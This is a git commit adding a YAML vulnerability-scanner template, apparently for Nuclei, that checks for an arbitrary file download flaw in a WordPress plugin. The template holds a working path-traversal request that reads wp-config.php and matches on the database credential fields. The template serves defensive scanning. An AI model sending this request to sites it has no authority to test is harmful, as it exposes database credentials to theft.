Create aspose-importer-exporter-file-download.yaml

patch-1
Roberto Nunes 2021-10-22 08:41:10 +09:00 committed by GitHub
parent b8aaf28eb6
commit 3400cfff5e
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 29 additions and 0 deletions

View File

@ -0,0 +1,29 @@
id: aspose-importer-exporter-file-download
info:
name: Wordpress Aspose Importer & Exporter v1.0 Plugin File Download
author: 0x_Akoko
severity: high
description: The Aspose importer and Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability.
reference:
- https://packetstormsecurity.com/files/131162/
- https://wordpress.org/plugins/aspose-importer-exporter
tags: wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200